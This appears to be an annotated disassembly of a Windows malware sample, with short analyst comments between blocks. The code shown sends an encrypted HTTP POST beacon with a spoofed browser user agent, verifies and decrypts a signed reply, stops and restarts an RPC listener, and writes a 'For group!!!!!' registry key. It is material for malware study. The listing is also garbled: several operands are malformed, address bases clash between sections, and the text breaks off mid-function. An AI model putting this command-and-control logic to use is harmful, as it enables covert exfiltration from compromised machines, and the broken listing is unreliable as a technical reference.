0x8D2C84   push ecx   
0x8D2C85   call dword ptr [0x8DE0B0h]   RtlAllocateHeap@NTDLL.DLL [3 Params]
0x8D2C8B   mov dword ptr [ebp-04h], eax   
0x8D2C8E   push 00000000h   
0x8D2C90   push 00000000h   
0x8D2C92   push 00000000h   
0x8D2C94   push 00000000h   
0x8D2C96   push 0x8DE2E8h  		 ASCII "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0"
0x8D2C9B   call dword ptr [0x8DE11Ch]   InternetOpenA@WININET.DLL [5 Params]
0x8D2CA1   mov dword ptr [ebp-10h], eax   
0x8D2CA4   cmp dword ptr [ebp-10h], 00000000h   
0x8D2CA8   je 0x8D2DFCh   target: 0x8D2DFC
0x8D2CAE   push 00000001h   
0x8D2CB0   push 00000000h   
0x8D2CB2   push 00000003h   
0x8D2CB4   push 00000000h   
0x8D2CB6   push 00000000h   
0x8D2CB8   movzx edx, word ptr [ebp-1Ch]   
0x8D2CBC   push edx   
0x8D2CBD   mov eax, dword ptr [ebp-14h]   
0x8D2CC0   push eax   
0x8D2CC1   mov ecx, dword ptr [ebp-10h]   
0x8D2CC4   push ecx   
0x8D2CC5   call dword ptr [0x8DE118h]   InternetConnectA@WININET.DLL [8 Params]
0x8D2CCB   mov dword ptr [ebp-24h], eax   
0x8D2CCE   cmp dword ptr [ebp-24h], 00000000h   
0x8D2CD2   je 0x8D2DF2h   target: 0x8D2DF2
0x8D2CD8   mov dword ptr [ebp-30h], 0x8DE2E4h   ASCII "*/*"
0x8D2CDF   mov dword ptr [ebp-2Ch], 00000000h   
0x8D2CE6   push 00000001h   
0x8D2CE8   push 00000100h   
0x8D2CED   lea edx, dword ptr [ebp-30h]   
0x8D2CF0   push edx   
0x8D2CF1   push 00000000h   
0x8D2CF3   push 00000000h   
0x8D2CF5   mov eax, dword ptr [ebp-0Ch]   
0x8D2CF8   push eax   
0x8D2CF9   push 0x8DE334h   		ASCII "POST"
0x8D2CFE   mov ecx, dword ptr [ebp-24h]   
0x8D2D01   push ecx   
0x8D2D02   call dword ptr [0x8DE114h]   HttpOpenRequestA@WININET.DLL [8 Params]
0x8D2D08   mov dword ptr [ebp-28h], eax   
0x8D2D0B   cmp dword ptr [ebp-28h], 00000000h   
0x8D2D0F   je 0x8D2DE8h   target: 0x8D2DE8
0x8D2D15   push 0x8DE33Ch   ASCII "Content-Type: application/x-www-form-urlencoded"
0x8D2D1A   mov edx, dword ptr [ebp-18h]   
0x8D2D1D   push edx   
0x8D2D1E   call dword ptr [008E12D0h]   strcpy@NTDLL.DLL [2 Params]
0x8D2D24   add esp, 08h   
0x8D2D27   mov eax, dword ptr [ebp-04h]   
0x8D2D2A   mov ecx, dword ptr [ebp+10h]   
0x8D2D2D   mov dword ptr [eax], ecx   
0x8D2D2F   mov edx, dword ptr [ebp+10h]   
0x8D2D32   push edx   
0x8D2D33   mov eax, dword ptr [ebp+0Ch]   
0x8D2D36   push eax   
0x8D2D37   mov ecx, dword ptr [ebp-04h]   
0x8D2D3A   add ecx, 04h   
0x8D2D3D   push ecx   
0x8D2D3E   call dword ptr [008E12E4h]   memcpy@NTDLL.DLL [Unknown Params]
0x8D2D44   add esp, 0Ch   
0x8D2D47   mov edx, dword ptr [ebp-04h]   
0x8D2D4A   add edx, dword ptr [ebp+10h]   
0x8D2D4D   mov eax, dword ptr [ebp+18h]   
0x8D2D50   mov dword ptr [edx+04h], eax   
0x8D2D53   mov ecx, dword ptr [ebp+18h]   
0x8D2D56   push ecx   
0x8D2D57   mov edx, dword ptr [ebp+14h]   
0x8D2D5A   push edx   
0x8D2D5B   mov eax, dword ptr [ebp+10h]   
0x8D2D5E   mov ecx, dword ptr [ebp-04h]   
0x8D2D61   lea edx, dword ptr [ecx+eax+08h]   
0x8D2D65   push edx   
0x8D2D66   call dword ptr [008E12E4h]   memcpy@NTDLL.DLL [Unknown Params]
0x8D2D6C   add esp, 0Ch   
0x8D2D6F   mov eax, dword ptr [ebp+18h]   
0x8D2D72   mov ecx, dword ptr [ebp+10h]   
0x8D2D75   lea edx, dword ptr [ecx+eax+08h]   
0x8D2D79   mov dword ptr [ebp-34h], edx   
0x8D2D7C   mov eax, dword ptr [ebp-34h]   
0x8D2D7F   push eax   
0x8D2D80   mov ecx, dword ptr [ebp-04h]   
0x8D2D83   push ecx   
0x8D2D84   mov edx, dword ptr [ebp-18h]   
0x8D2D87   push edx   
0x8D2D88   call dword ptr [008E12BCh]   strlen@NTDLL.DLL [2 Params]
0x8D2D8E   add esp, 04h   
0x8D2D91   push eax   
0x8D2D92   mov eax, dword ptr [ebp-18h]   
0x8D2D95   push eax   
0x8D2D96   mov ecx, dword ptr [ebp-28h]   
0x8D2D99   push ecx   
0x8D2D9A   call dword ptr [0x8DE110h]   HttpSendRequestA@WININET.DLL [5 Params]
0x8D2DA0   test eax, eax   
0x8D2DA2   je 0x8D2DDEh   target: 0x8D2DDE
0x8D2DA4   lea edx, dword ptr [ebp-20h]   xref: 0x8D2DDC
0x8D2DA7   push edx   
0x8D2DA8   push 00001000h   
0x8D2DAD   mov eax, dword ptr [ebp+1Ch]   
0x8D2DB0   add eax, dword ptr [ebp-08h]   
0x8D2DB3   push eax   
0x8D2DB4   mov ecx, dword ptr [ebp-28h]   
0x8D2DB7   push ecx   
0x8D2DB8   call dword ptr [0x8DE10Ch]   InternetReadFile@WININET.DLL [4 Params]
0x8D2DBE   test eax, eax   
0x8D2DC0   jne 0x8D2DCBh   target: 0x8D2DCB
0x8D2DC2   mov dword ptr [ebp-08h], 00000000h   
0x8D2DC9   jmp 0x8D2DDEh   target: 0x8D2DDE
0x8D2DCB   cmp dword ptr [ebp-20h], 00000000h   xref: 0x8D2DC0
0x8D2DCF   jne 0x8D2DD3h   target: 0x8D2DD3
0x8D2DD1   jmp 0x8D2DDEh   target: 0x8D2DDE
0x8D2DD3   mov edx, dword ptr [ebp-08h]   xref: 0x8D2DCF
0x8D2DD6   add edx, dword ptr [ebp-20h]   
0x8D2DD9   mov dword ptr [ebp-08h], edx   
0x8D2DDC   jmp 0x8D2DA4h   target: 0x8D2DA4
0x8D2DDE   mov eax, dword ptr [ebp-28h]   xref: 0x8D2DA2 0x8D2DD1 0x8D2DC9
0x8D2DE1   push eax   
0x8D2DE2   call dword ptr [0x8DE108h]   InternetCloseHandle@WININET.DLL [1 Params]
0x8D2DE8   mov ecx, dword ptr [ebp-24h]   xref: 0x8D2D0F
0x8D2DEB   push ecx   
0x8D2DEC   call dword ptr [0x8DE108h]   InternetCloseHandle@WININET.DLL [1 Params]
0x8D2DF2   mov edx, dword ptr [ebp-10h]   xref: 0x8D2CD2
0x8D2DF5   push edx   
0x8D2DF6   call dword ptr [0x8DE108h]   InternetCloseHandle@WININET.DLL [1 Params]
0x8D2DFC   mov eax, dword ptr [ebp-18h]   xref: 0x8D2CA8
0x8D2DFF   push eax   
0x8D2E00   push 00000000h   
0x8D2E02   mov ecx, dword ptr [008E12D8h]   0x00AC0000
0x8D2E08   push ecx   
0x8D2E09   call dword ptr [0x8DE0B4h]   RtlFreeHeap@NTDLL.DLL [3 Params]
0x8D2E0F   mov edx, dword ptr [ebp-04h]   
0x8D2E12   push edx   
0x8D2E13   push 00000000h   
0x8D2E15   mov eax, dword ptr [008E12D8h]   0x00AC0000
0x8D2E1A   push eax   
0x8D2E1B   call dword ptr [0x8DE0B4h]   RtlFreeHeap@NTDLL.DLL [3 Params]
0x8D2E21   mov ecx, dword ptr [ebp-14h]   
0x8D2E24   push ecx   
0x8D2E25   push 00000000h   
0x8D2E27   mov edx, dword ptr [008E12D8h]   0x00AC0000
0x8D2E2D   push edx   
0x8D2E2E   call dword ptr [0x8DE0B4h]   RtlFreeHeap@NTDLL.DLL [3 Params]
0x8D2E34   mov eax, dword ptr [ebp-0Ch]   
0x8D2E37   push eax   
0x8D2E38   push 00000000h   
0x8D2E3A   mov ecx, dword ptr [008E12D8h]   0x00AC0000
0x8D2E40   push ecx   
0x8D2E41   call dword ptr [0x8DE0B4h]   RtlFreeHeap@NTDLL.DLL [3 Params]
0x8D2E47   mov eax, dword ptr [ebp-08h]   
0x8D2E4A   mov esp, ebp   
0x8D2E4C   pop ebp   
0x8D2E4D   ret 

// Using WindowsEncryption for sending data in POST

0x8D2E50   push ebp   xref: 0x8D5AC1 0x8D5A8E
0x8D2E51   mov ebp, esp   
0x8D2E53   sub esp, 70h   
0x8D2E56   mov dword ptr [ebp-0Ch], 00000000h   
0x8D2E5D   mov eax, dword ptr [ebp+0Ch]   
0x8D2E60   mov dword ptr [ebp-54h], eax   
0x8D2E63   mov ecx, dword ptr [ebp-54h]   
0x8D2E66   add ecx, 01h   
0x8D2E69   mov dword ptr [ebp-58h], ecx   
0x8D2E6C   mov edx, dword ptr [ebp-54h]   xref: 0x8D2E7C
0x8D2E6F   mov al, byte ptr [edx]   
0x8D2E71   mov byte ptr [ebp-59h], al   
0x8D2E74   add dword ptr [ebp-54h], 01h   
0x8D2E78   cmp byte ptr [ebp-59h], 00000000h   
0x8D2E7C   jne 0x8D2E6Ch   target: 0x8D2E6C
0x8D2E7E   mov ecx, dword ptr [ebp-54h]   
0x8D2E81   sub ecx, dword ptr [ebp-58h]   
0x8D2E84   mov dword ptr [ebp-60h], ecx   
0x8D2E87   cmp dword ptr [ebp-60h], 00000800h   
0x8D2E8E   jbe 0x8D2E99h   target: 0x8D2E99
0x8D2E90   mov dword ptr [ebp-04h], 00100000h   
0x8D2E97   jmp 0x8D2EA0h   target: 0x8D2EA0
0x8D2E99   mov dword ptr [ebp-04h], 00001000h   xref: 0x8D2E8E
0x8D2EA0   mov edx, dword ptr [ebp-04h]   xref: 0x8D2E97
0x8D2EA3   push edx   
0x8D2EA4   call dword ptr [0x8DE0D8h]   malloc@MSVCRT.DLL [0 Params]
0x8D2EAA   add esp, 04h   
0x8D2EAD   mov dword ptr [ebp-14h], eax   
0x8D2EB0   mov eax, dword ptr [ebp-04h]   
0x8D2EB3   mov dword ptr [ebp-18h], eax   
0x8D2EB6   mov ecx, dword ptr [ebp-04h]   
0x8D2EB9   push ecx   
0x8D2EBA   call dword ptr [0x8DE0D8h]   malloc@MSVCRT.DLL [0 Params]
0x8D2EC0   add esp, 04h   
0x8D2EC3   mov dword ptr [ebp-08h], eax   
0x8D2EC6   mov edx, dword ptr [ebp-04h]   
0x8D2EC9   mov dword ptr [ebp-10h], edx   
0x8D2ECC   mov eax, dword ptr [ebp+0Ch]   
0x8D2ECF   mov dword ptr [ebp-64h], eax   
0x8D2ED2   mov ecx, dword ptr [ebp-64h]   
0x8D2ED5   add ecx, 01h   
0x8D2ED8   mov dword ptr [ebp-68h], ecx   
0x8D2EDB   mov edx, dword ptr [ebp-64h]   xref: 0x8D2EEB
0x8D2EDE   mov al, byte ptr [edx]   
0x8D2EE0   mov byte ptr [ebp-69h], al   
0x8D2EE3   add dword ptr [ebp-64h], 01h   
0x8D2EE7   cmp byte ptr [ebp-69h], 00000000h   
0x8D2EEB   jne 0x8D2EDBh   target: 0x8D2EDB
0x8D2EED   mov ecx, dword ptr [ebp-64h]   
0x8D2EF0   sub ecx, dword ptr [ebp-68h]   
0x8D2EF3   mov dword ptr [ebp-70h], ecx   
0x8D2EF6   push 00000000h   
0x8D2EF8   push 00000000h   
0x8D2EFA   push 00000009h   
0x8D2EFC   mov edx, dword ptr [ebp-70h]   
0x8D2EFF   push edx   
0x8D2F00   mov eax, dword ptr [ebp+0Ch]   
0x8D2F03   push eax   
0x8D2F04   lea ecx, dword ptr [ebp-18h]   
0x8D2F07   push ecx   
0x8D2F08   mov edx, dword ptr [ebp-14h]   
0x8D2F0B   push edx   
0x8D2F0C   call 0x8D8430h   target: 0x8D8430
0x8D2F11   test eax, eax   
0x8D2F13   jne 0x8D3107h   target: 0x8D3107
0x8D2F19   push 00000010h   
0x8D2F1B   lea eax, dword ptr [ebp-2Ch]   
0x8D2F1E   push eax   
0x8D2F1F   call 0x8D1EB0h   target: 0x8D1EB0
0x8D2F24   add esp, 08h   
0x8D2F27   push 00000010h   
0x8D2F29   lea ecx, dword ptr [ebp-2Ch]   
0x8D2F2C   push ecx   
0x8D2F2D   mov edx, dword ptr [ebp-18h]   
0x8D2F30   push edx   
0x8D2F31   mov eax, dword ptr [ebp-08h]   
0x8D2F34   push eax   
0x8D2F35   mov ecx, dword ptr [ebp-14h]   
0x8D2F38   push ecx   
0x8D2F39   call 0x8D1E10h   target: 0x8D1E10
0x8D2F3E   add esp, 14h   
0x8D2F41   mov edx, dword ptr [ebp-18h]   
0x8D2F44   mov dword ptr [ebp-10h], edx   
0x8D2F47   mov dword ptr [ebp-1Ch], 00000000h   
0x8D2F4E   push 00000010h   
0x8D2F50   lea eax, dword ptr [ebp-1Ch]   
0x8D2F53   push eax   
0x8D2F54   push 00000000h   
0x8D2F56   push 00000000h   
0x8D2F58   push 00000001h   
0x8D2F5A   push 00000000h   
0x8D2F5C   mov ecx, dword ptr [ebp+18h]   
0x8D2F5F   push ecx   
0x8D2F60   call dword ptr [0x8DE004h]   CryptEncrypt@ADVAPI32.DLL [7 Params]
0x8D2F66   test eax, eax   
0x8D2F68   je 0x8D3107h   target: 0x8D3107
0x8D2F6E   mov edx, dword ptr [ebp-1Ch]   
0x8D2F71   push edx   
0x8D2F72   call dword ptr [0x8DE0D8h]   malloc@MSVCRT.DLL [0 Params]
0x8D2F78   add esp, 04h   
0x8D2F7B   mov dword ptr [ebp-34h], eax   
0x8D2F7E   mov dword ptr [ebp-30h], 00000010h   
0x8D2F85   mov eax, dword ptr [ebp-34h]   
0x8D2F88   mov ecx, dword ptr [ebp-2Ch]   
0x8D2F8B   mov dword ptr [eax], ecx   
0x8D2F8D   mov edx, dword ptr [ebp-28h]   
0x8D2F90   mov dword ptr [eax+04h], edx   
0x8D2F93   mov ecx, dword ptr [ebp-24h]   
0x8D2F96   mov dword ptr [eax+08h], ecx   
0x8D2F99   mov edx, dword ptr [ebp-20h]   
0x8D2F9C   mov dword ptr [eax+0Ch], edx   
0x8D2F9F   mov eax, dword ptr [ebp-1Ch]   
0x8D2FA2   push eax   
0x8D2FA3   lea ecx, dword ptr [ebp-30h]   
0x8D2FA6   push ecx   
0x8D2FA7   mov edx, dword ptr [ebp-34h]   
0x8D2FAA   push edx   
0x8D2FAB   push 00000000h   
0x8D2FAD   push 00000001h   
0x8D2FAF   push 00000000h   
0x8D2FB1   mov eax, dword ptr [ebp+18h]   
0x8D2FB4   push eax   
0x8D2FB5   call dword ptr [0x8DE004h]   CryptEncrypt@ADVAPI32.DLL [7 Params]
0x8D2FBB   test eax, eax   
0x8D2FBD   je 0x8D30FAh   target: 0x8D30FA
0x8D2FC3   mov ecx, dword ptr [ebp+10h]   
0x8D2FC6   push ecx   
0x8D2FC7   mov edx, dword ptr [ebp-10h]   
0x8D2FCA   push edx   
0x8D2FCB   mov eax, dword ptr [ebp-08h]   
0x8D2FCE   push eax   
0x8D2FCF   mov ecx, dword ptr [ebp-1Ch]   
0x8D2FD2   push ecx   
0x8D2FD3   mov edx, dword ptr [ebp-34h]   
0x8D2FD6   push edx   
0x8D2FD7   mov eax, dword ptr [ebp+08h]   
0x8D2FDA   push eax   
0x8D2FDB   call 0x8D2C00h   target: 0x8D2C00
0x8D2FE0   add esp, 18h   
0x8D2FE3   mov dword ptr [ebp-38h], eax   
0x8D2FE6   cmp dword ptr [ebp-38h], 04h   
0x8D2FEA   jbe 0x8D30FAh   target: 0x8D30FA
0x8D2FF0   mov ecx, dword ptr [ebp+10h]   
0x8D2FF3   mov edx, dword ptr [ecx]   
0x8D2FF5   mov dword ptr [ebp-3Ch], edx   
0x8D2FF8   mov eax, dword ptr [ebp+10h]   
0x8D2FFB   add eax, 04h   
0x8D2FFE   mov dword ptr [ebp-40h], eax   
0x8D3001   mov ecx, dword ptr [ebp-3Ch]   
0x8D3004   add ecx, 08h   
0x8D3007   cmp ecx, dword ptr [ebp-38h]   
0x8D300A   jnc 0x8D30FAh   target: 0x8D30FA
0x8D3010   mov edx, dword ptr [ebp+10h]   
0x8D3013   add edx, dword ptr [ebp-3Ch]   
0x8D3016   mov eax, dword ptr [edx+04h]   
0x8D3019   mov dword ptr [ebp-44h], eax   
0x8D301C   mov ecx, dword ptr [ebp-3Ch]   
0x8D301F   mov edx, dword ptr [ebp+10h]   
0x8D3022   lea eax, dword ptr [edx+ecx+08h]   
0x8D3026   mov dword ptr [ebp-48h], eax   
0x8D3029   mov ecx, dword ptr [ebp-44h]   
0x8D302C   mov edx, dword ptr [ebp-3Ch]   
0x8D302F   lea eax, dword ptr [edx+ecx+08h]   
0x8D3033   cmp eax, dword ptr [ebp-38h]   
0x8D3036   jne 0x8D30FAh   target: 0x8D30FA
0x8D303C   lea ecx, dword ptr [ebp-4Ch]   
0x8D303F   push ecx   
0x8D3040   push 00000000h   
0x8D3042   push 00000000h   
0x8D3044   push 00008003h   
0x8D3049   mov edx, dword ptr [ebp+14h]   
0x8D304C   push edx   
0x8D304D   call dword ptr [0x8DE0x8h]   CryptCreateHash@ADVAPI32.DLL [5 Params]
0x8D3053   push 00000000h   
0x8D3055   push 00000010h   
0x8D3057   lea eax, dword ptr [ebp-2Ch]   
0x8D305A   push eax   
0x8D305B   mov ecx, dword ptr [ebp-4Ch]   
0x8D305E   push ecx   
0x8D305F   call dword ptr [0x8DE00Ch]   CryptHashData@ADVAPI32.DLL [4 Params]
0x8D3065   push 00000000h   
0x8D3067   push 00000000h   
0x8D3069   mov edx, dword ptr [ebp+18h]   
0x8D306C   push edx   
0x8D306D   mov eax, dword ptr [ebp-3Ch]   
0x8D3070   push eax   
0x8D3071   mov ecx, dword ptr [ebp-40h]   
0x8D3074   push ecx   
0x8D3075   mov edx, dword ptr [ebp-4Ch]   
0x8D3078   push edx   
0x8D3079   call dword ptr [0x8DE010h]   CryptVerifySignatureA@ADVAPI32.DLL [6 Params]
0x8D307F   test eax, eax   
0x8D3081   je 0x8D30F0h   target: 0x8D30F0
0x8D3083   mov eax, dword ptr [ebp-44h]   
0x8D3086   push eax   
0x8D3087   call dword ptr [0x8DE0D8h]   malloc@MSVCRT.DLL [0 Params]
0x8D308D   add esp, 04h   
0x8D3090   mov dword ptr [ebp-50h], eax   
0x8D3093   push 00000010h   
0x8D3095   lea ecx, dword ptr [ebp-2Ch]   
0x8D3098   push ecx   
0x8D3099   mov edx, dword ptr [ebp-44h]   
0x8D309C   push edx   
0x8D309D   mov eax, dword ptr [ebp-50h]   
0x8D30A0   push eax   
0x8D30A1   mov ecx, dword ptr [ebp-48h]   
0x8D30A4   push ecx   
0x8D30A5   call 0x8D1E10h   target: 0x8D1E10
0x8D30AA   add esp, 14h   
0x8D30AD   mov dword ptr [ebp-0Ch], 00A00000h   
0x8D30B4   push 00000000h   xref: 0x8D317D
0x8D30B6   push 00000000h   
0x8D30B8   mov edx, dword ptr [ebp-44h]   xref: 0x8D318D
0x8D30BB   push edx   
0x8D30BC   mov eax, dword ptr [ebp-50h]   
0x8D30BF   push eax   
0x8D30C0   lea ecx, dword ptr [ebp-0Ch]   
0x8D30C3   push ecx   
0x8D30C4   mov edx, dword ptr [ebp+10h]   
0x8D30C7   push edx   
0x8D30C8   call 0x8D84FAh   target: 0x8D84FA
0x8D30CD   test eax, eax   
0x8D30CF   jne 0x8D30DCh   target: 0x8D30DC
0x8D30D1   mov eax, dword ptr [ebp+10h]   
0x8D30D4   add eax, dword ptr [ebp-0Ch]   
0x8D30D7   mov byte ptr [eax], 00000000h   
0x8D30DA   jmp 0x8D30E3h   target: 0x8D30E3
0x8D30DC   mov dword ptr [ebp-0Ch], 00000000h   xref: 0x8D30CF
0x8D30E3   mov ecx, dword ptr [ebp-50h]   xref: 0x8D30DA
0x8D30E6   push ecx   
0x8D30E7   call dword ptr [0x8DE0D4h]   free@MSVCRT.DLL [0 Params]
0x8D30ED   add esp, 04h   
0x8D30F0   mov edx, dword ptr [ebp-4Ch]   xref: 0x8D3081
0x8D30F3   push edx   
0x8D30F4   call dword ptr [0x8DE000h]   CryptDestroyHash@ADVAPI32.DLL [1 Params]
0x8D30FA   mov eax, dword ptr [ebp-34h]   xref: 0x8D2FBD 0x8D2FEA 0x8D300A 0x8D3036
0x8D30FD   push eax   
0x8D30FE   call dword ptr [0x8DE0D4h]   free@MSVCRT.DLL [0 Params]
0x8D3104   add esp, 04h   
0x8D3107   mov ecx, dword ptr [ebp-14h]   xref: 0x8D2F13 0x8D2F68
0x8D310A   push ecx   
0x8D310B   call dword ptr [0x8DE0D4h]   free@MSVCRT.DLL [0 Params]
0x8D3111   add esp, 04h   
0x8D3114   mov edx, dword ptr [ebp-08h]   
0x8D3117   push edx   
0x8D3118   call dword ptr [0x8DE0D4h]   free@MSVCRT.DLL [0 Params]
0x8D311E   add esp, 04h   
0x8D3121   mov eax, dword ptr [ebp-0Ch]   
0x8D3124   mov esp, ebp   
0x8D3126   pop ebp   
0x8D3127   ret    function end 

// Stopping RPC Service....

0x1031D8   call dword ptr [0x101130h]   RpcServerUnregisterIf@RPCRT4.DLL 
0x1031DE   mov esi, 0x104094h   
0x1031E3   push esi   
0x1031E4   mov edi, eax   
0x1031E6   call dword ptr [0x10x168h]   EnterCriticalSection@KERNEL32.DLL 
0x1031EC   dec dword ptr [0x104090h]   
0x1031F2   jne 0x103202h   target: 0x103202
0x1031F4   push 00000000h   
0x1031F6   call dword ptr [0x101144h]   RpcMgmtStopServerListening@RPCRT4.DLL [1 Params]
0x1031FC   call dword ptr [0x101128h]   RpcMgmtWaitServerListen@RPCRT4.DLL 
0x103202   push esi   xref: 0x1031F2
0x103203   call dword ptr [0x10x160h]   LeaveCriticalSection@KERNEL32.DLL 
0x103209   push edi   
0x10320A   call dword ptr [0x101140h]   I_RpcMapWin32Status@RPCRT4.DLL [1 Params]
0x103210   pop edi   
0x103211   pop esi   
0x103212   pop ebp   
0x103213   retn 0004h

// Restarted it...

0x1001DE2   push ebp   
0x1001DE3   mov ebp, esp   
0x1001DE5   push esi   
0x1001DE6   push edi   
0x1001DE7   mov esi, 0x1004094h   
0x1001DEC   push esi   
0x1001DED   call dword ptr [0x1001068h]   EnterCriticalSection@KERNEL32.DLL 
0x1001DF3   push dword ptr [ebp+0Ch]   
0x1001DF6   push dword ptr [ebp+08h]   
0x1001DF9   call 0x1001E47h   target: 0x1001E47
0x1001DFE   mov edi, eax   
0x1001E00   test edi, edi   
0x1001E02   jne 0x1001E2Eh   target: 0x1001E2E
0x1001E04   inc dword ptr [0x1004090h]   
0x1001E0A   cmp dword ptr [0x1004090h], 01h   
0x1001E11   jne 0x1001E2Eh   target: 0x1001E2E
0x1001E13   push 00000001h   
0x1001E15   push 00003039h   
0x1001E1A   push 00000001h   
0x1001E1C   call dword ptr [0x1001134h]   RpcServerListen@RPCRT4.DLL 
0x1001E22   mov edi, eax   
0x1001E24   cmp edi, 000006B1h   
0x1001E2A   jne 0x1001E2Eh   target: 0x1001E2E
0x1001E2C   xor edi, edi   
0x1001E2E   push esi   xref: 0x1001E02 0x1001E11 0x1001E2A
0x1001E2F   call dword ptr [0x1001060h]   LeaveCriticalSection@KERNEL32.DLL 
0x1001E35   push edi   
0x1001E36   call dword ptr [0x1001140h]   I_RpcMapWin32Status@RPCRT4.DLL [1 Params]
0x1001E3C   pop edi   
0x1001E3D   pop esi   
0x1001E3E   pop ebp   
0x1001E3F   retn 0008h


// The typical "For group!!!!!" registry buff..

/*

    For group!!!!!, ADDR : 0x0D6EA1
    For group!!!!!, ADDR: 0x0D6EC8
    For group!!!!!, ADDR: 0x0D6EF9
    For group!!!!!, ADDR: 0x0D6F3A
*/
0x0D6E00   push ebp   xref: 0x0D63D3
0x0D6E01   mov ebp, esp   
0x0D6E03   sub esp, 28h   
0x0D6E06   push esi   
0x0D6E07   mov byte ptr [ebp-15h], 00000000h   
0x0D6E0B   push 00001000h   
0x0D6E10   push 00000000h   
0x0D6E12   mov eax, dword ptr [008E12D8h]   0x00AC0000
0x0D6E17   push eax   
0x0D6E18   call dword ptr [0x0DE0B0h]   RtlAllocateHeap@NTDLL.DLL [3 Params]
0x0D6E1E   mov dword ptr [ebp-20h], eax   
0x0D6E21   push 00001000h   
0x0D6E26   push 00000000h   
0x0D6E28   mov ecx, dword ptr [008E12D8h]   0x00AC0000
0x0D6E2E   push ecx   
0x0D6E2F   call dword ptr [0x0DE0B0h]   RtlAllocateHeap@NTDLL.DLL [3 Params]
0x0D6E35   mov dword ptr [ebp-1Ch], eax   
0x0D6E38   lea edx, dword ptr [ebp-0Ch]   
0x0D6E3B   push edx   
0x0D6E3C   call 0x0D19D0h   target: 0x0D19D0
0x0D6E41   add esp, 04h   
0x0D6E44   push 0x0DF028h   		ASCII "Software\"
0x0D6E49   mov eax, dword ptr [ebp-20h]   
0x0D6E4C   push eax   
0x0D6E4D   call dword ptr [008E12D0h]   strcpy@NTDLL.DLL [2 Params]
0x0D6E53   add esp, 08h   
0x0D6E56   lea ecx, dword ptr [ebp-0Ch]   
0x0D6E59   push ecx   
0x0D6E5A   mov edx, dword ptr [ebp-20h]   
0x0D6E5D   push edx   
0x0D6E5E   call dword ptr [008E12E0h]   strcat@NTDLL.DLL [2 Params]
0x0D6E64   add esp, 08h   
0x0D6E67   mov eax, dword ptr [ebp-1Ch]   
0x0D6E6A   push eax   
0x0D6E6B   call 0x0D19D0h   target: 0x0D19D0
0x0D6E70   add esp, 04h   
0x0D6E73   push 00001000h   
0x0D6E78   push 00000000h   
0x0D6E7A   mov ecx, dword ptr [008E12D8h]   0x00AC0000
0x0D6E80   push ecx   
0x0D6E81   call dword ptr [0x0DE0B0h]   RtlAllocateHeap@NTDLL.DLL [3 Params]
0x0D6E87   mov dword ptr [ebp-14h], eax   
0x0D6E8A   push 00001000h   
0x0D6E8F   push 00000000h   
0x0D6E91   mov edx, dword ptr [008E12D8h]   0x00AC0000
0x0D6E97   push edx   
0x0D6E98   call dword ptr [0x0DE0B0h]   RtlAllocateHeap@NTDLL.DLL [3 Params]
0x0D6E9E   mov dword ptr [ebp-24h], eax   
0x0D6EA1   push 0x0DF034h   		ASCII "For group!!!!!"
0x0D6EA6   mov eax, dword ptr [ebp-14h]   
0x0D6EA9   push eax   
0x0D6EAA   call dword ptr [008E12D0h]   strcpy@NTDLL.DLL [2 Params]
0x0D6EB0   add esp, 08h   
0x0D6EB3   mov ecx, dword ptr [ebp+08h]   
0x0D6EB6   push ecx   
0x0D6EB7   call dword ptr [008E12BCh]   strlen@NTDLL.DLL [2 Params]
0x0D6EBD   add esp, 04h   
0x0D6EC0   add eax, 01h   
0x0D6EC3   push eax   
0x0D6EC4   mov edx, dword ptr [ebp+08h]   
0x0D6EC7   push edx   
0x0D6EC8   push 0x0DF044h   		ASCII "For group!!!!!"
0x0D6ECD   call dword ptr [008E12BCh]   strlen@NTDLL.DLL [2 Params]
0x0D6ED3   add esp, 04h   
0x0D6ED6   mov ecx, dword ptr [ebp-14h]   
0x0D6ED9   lea edx, dword ptr [ecx+eax+01h]   
0x0D6EDD   push edx   
0x0D6EDE   call dword ptr [008E12E4h]   memcpy@NTDLL.DLL [Unknown Params]
0x0D6EE4   add esp, 0Ch   
0x0D6EE7   mov eax, dword ptr [ebp+0Ch]   
0x0D6EEA   push eax   
0x0D6EEB   call dword ptr [008E12BCh]   strlen@NTDLL.DLL [2 Params]
0x0D6EF1   add esp, 04h   
0x0D6EF4   push eax   
0x0D6EF5   mov ecx, dword ptr [ebp+0Ch]   
0x0D6EF8   push ecx   
0x0D6EF9   push 0x0DF054h   		ASCII "For group!!!!!"
0x0D6EFE   call dword ptr [008E12BCh]   strlen@NTDLL.DLL [2 Params]
0x0D6F04   add esp, 04h   
0x0D6F07   mov esi, eax   
0x0D6F09   mov edx, dword ptr [ebp+08h]   
0x0D6F0C   push edx   
0x0D6F0D   call dword ptr [008E12BCh]   strlen@NTDLL.DLL [2 Params]
0x0D6F13   add esp, 04h   
0x0D6F16   lea eax, dword ptr [esi+eax+02h]   
0x0D6F1A   push eax   
0x0D6F1B   mov ecx, dword ptr [ebp-24h]   
0x0D6F1E   push ecx   
0x0D6F1F   mov edx, dword ptr [ebp-14h]   
0x0D6F22   push edx   
0x0D6F23   call 0x0D1E10h   target: 0x0D1E10
0x0D6F28   add esp, 14h   
0x0D6F2B   mov eax, dword ptr [ebp+08h]   
0x0D6F2E   push eax   
0x0D6F2F   call dword ptr [008E12BCh]   strlen@NTDLL.DLL [2 Params]
0x0D6F35   add esp, 04h   
0x0D6F38   mov esi, eax   
0x0D6F3A   push 0x0DF064h   		ASCII "For group!!!!!"
0x0D6F3F   call dword ptr [008E12BCh]   strlen@NTDLL.DLL [2 Params]
0x0D6F45   add esp, 04h   
0x0D6F48   lea ecx, dword ptr [esi+eax+02h]   
0x0D6F4C   mov dword ptr [ebp-28h], ecx   
0x0D6F4F   lea edx, dword ptr [ebp-10h]   
0x0D6F52   push edx   
0x0D6F53   mov eax, dword ptr [ebp-20h]   
0x0D6F56   push eax   
0x0D6F57   push 80000001h   
0x0D6F5C   call dword ptr [0x0DE018h]   RegCreateKeyA@ADVAPI32.DLL [3 Params]
0x0D6F62   test eax, eax   
0x0D6F64   jne 0x0D6F92h   target: 0x0D6F92
0x0D6F66   mov ecx, dword ptr [ebp-28h]   
0x0D6F69   push ecx   
0x0D6F6A   mov edx, dword ptr [ebp-24h]   
0x0D6F6D   push edx   
0x0D6F6E   push 00000003h   
0x0D6F70   push 00000000h   
0x0D6F72   mov eax, dword ptr [ebp-1Ch]   
0x0D6F75   push eax   
0x0D6F76   mov ecx, dword ptr [ebp-10h]   
0x0D6F79   push ecx   
